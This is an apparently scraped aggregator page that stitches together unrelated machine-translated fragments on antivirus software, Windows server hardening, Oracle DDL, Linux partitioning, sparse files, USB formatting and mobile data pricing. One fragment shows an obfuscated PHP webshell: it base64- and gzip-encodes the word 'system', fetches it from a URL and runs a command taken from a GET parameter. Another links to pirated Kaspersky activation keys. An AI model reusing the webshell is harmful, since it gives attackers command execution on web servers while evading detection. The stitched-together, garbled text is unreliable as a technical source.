://www.kaspersky.com.cn/KL-Downloads/KL-ProductDownload.htm
Kaspersky Fully functional security software (KIS) = Kaspersky Anti-Virus software (KAV) + network firewall
I use the anti-virus software is this (KIS), has been for many years. Need activation code or authorization file for friends, you can download: Kaspersky (kis/kav) All versions of key (authorization file): http://www.shjue.com/post/5.html
2. Norton Anti-virus software: http://www.sym
, the server's database for Ms-sql,ms-sql service software SQL2000 installed in the D:\ms-sqlserver2K directory, to the SA account set a strong enough password, installed a SP3 patch. In order to facilitate web page producers to manage the Web, the site also opened the FTP service, FTP service software using the Serv-u 5.1.0.0, installed in the D:\ftpservice\serv-u directory. Antivirus software and firewalls are the Norton Antivirus and BlackICE respe
current user environment as an administrator to run the application!
Let's say that we are now in the normal user environment and would like to configure Norton Personal Security's trusting domain. However, because the current user's "Face (ie permissions)" is not big enough, the firewall configuration program refused to execute. We're here to sacrifice Fast User Switching this "precious DAO": Open "start → All programs →
we can give each volume or each directory to set different permissions, once a network security accident, can also reduce the loss to the minimum.
Of course, you can also distribute the site's data on different servers, make it a server farm, each server has a different user name and password and provide a different service, so the security is higher. But people who are willing to do so have a feature----money:).
Well, to get to the bottom of this, the server's database for Ms-sql,ms-sql serv
With unlimited broadband popularity, in order to facilitate BT download, many friends love 24-hour hanging machine. All-weather online, which gives some viruses, trojans "intrusion" system has brought great convenience, they can invade our computer in the middle of the night, wanton abuse. Recently, the author in helping a friend antivirus, encountered a "cannot remove virus", the following will be killing experience with everyone to share.
1. Virus discovered. The friend's computer installs is
Use Windows 2000/XP Dual system users, in the daily work is best not to log in as a member of the Administrators group, usually should use the ordinary users (Users group member) identity login system, because the Users group account can not modify system registry settings, operating system files or program files, Therefore, the virus, Trojan has innate immune function! However, users cannot use applications that can only be executed by system administrators.
What if you want to use all the fea
For you to pay treasure software users to detailed analysis to share the Ant big Treasure Card to support the processing area.
Analytical sharing:
At present, except the Tibet Autonomous Region outside the provinces and cities can handle ants big treasure card.
Ant big Treasure Card exceeds the package domestic flow 1m-100m, according to 0.1 yuan/m billing, 101m-1024m when not billing, that is, 10 yuan/GB;
Flow benefits: Exceed package domestic fl
of the partitions should be:"/boot" partition (primary partition), "/" Partition (logic), "/Home" Partition (logic), "swap" Partition (logic)(1)/boot split slotAllocate 102M space. (Fill in 100M or 101M, the final allocation of 99M, so fill in 102M, the system will eventually assign the root directory 100M)(2) split slot for root directory (/)The root directory allocates a size of 10001M(3) The partition slot of the/home directoryAllocate 10001M spac
load, which bypasses DataBuffer direct write data files.For example, create table as SELECT, insert/*+append */,This creates a waste of space, such as pouring 1010M of data, each extent 100m,direct path load assigns a new 100m extent to hold the data (if there is a extent less than 100m, the normal insert can use these spaces). Assuming that 10 concurrent, each concurrent pour 101M data, will create 2 extent, then a total of 20 extent will be created
examples.Make gzcompress and Base64_encode encoded files:PHP $c = ' System '; $data gzcompress ($c); $file _data Base64_encode ($data); Echo $file _data ; fwrite (fopen$file _data);So we've created a system string that's compressed and then 64 encoded.Use:PHP $c file_get_contents (' Http://localhost/shell.txt '); # Get Data $s gzuncompress (base64_decode($c)); # Decrypt Data $s ($_get[session]); # Execute CommandSo the question is, why do we have to turn a big circle and come back?The reason is
. Because BS is 1 bytes, so that is the size of 10G, but in fact, there is no space on the hard disk, Occupy space only 1k content. When the content is written to, it is allocated space on the hard disk. We can use the LS command to see the actual distribution of 12K and 4K.~hchen$ sudo ls-lsh/tmp/data.img12k-rw-r--r--. 1 root root 11G 23:01/tmp/data.img~hchen$ sudo ls-slh/tmp/meta.data.img4.0k-rw-r--r--. 1 root root 101M 23:17/tmp/meta.data.imgThen,
/orcl/orcl/datafile/o1_mf_s_5vrl1t7h_.dbf
-RW-------1 Oracle oinstall 101M APR 7 16:54/u01/app/oracle/oradata/orcl/orcl/datafile/o1_mf_s_5vrl1t7h_.dbf
sql> CREATE tablespace t datafile SIZE 10m; /* You can also specify the size of the data file to be mb*/
Tablespace created.
Sql> SELECT NAME from V$datafile;
NAME
--------------------------------------------------------------------------------
/u01/app/oracle/oradata/orcl/system01.dbf
/u01/app/
U disk from the 4g/8g/16g into 101M, I believe many friends have encountered this situation, if your U disk is also inexplicably become small, do not panic, this is because your U disk error lattice. In this case, we can use the general U disk Low grid tool for processing, as long as the insertion card reader to read, you can shrink the U disk to the low lattice.
We can download the USB U-disk low-level format TOOL (XP down-grid tool supports removab
rebuild
ALTER TABLE move
ALTER TABLE split
Add the parallel clause after these SQL statementsExample 1. Alter TableSQL>altertable t1 move parallel; Table AlteredExample 2. Alter IndexSQL>Createindex on T1 (OWNER, object_type) tablespace SYSTEM parallel;V. Concurrency and space waste
Parallel DDL and some pdml rely on direct path load, which bypasses DataBuffer direct write data files.For example, create table as SELECT, insert/*+append */,This will create a waste of
Tags: varnish bandwidth increase quota DNS driver POSIX php rectangleSystem KnowledgeFirst, the computer systemComputer system consists of two parts: hardware (Hardware) system and Software (software) system.Computer (computer): Commonly known as a computer, it is a modern intelligent electronic device that can accept and store information and handle the mass data automatically and at high speed according to the procedures stored in it. Computer storage unit;1k=1024=2^
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.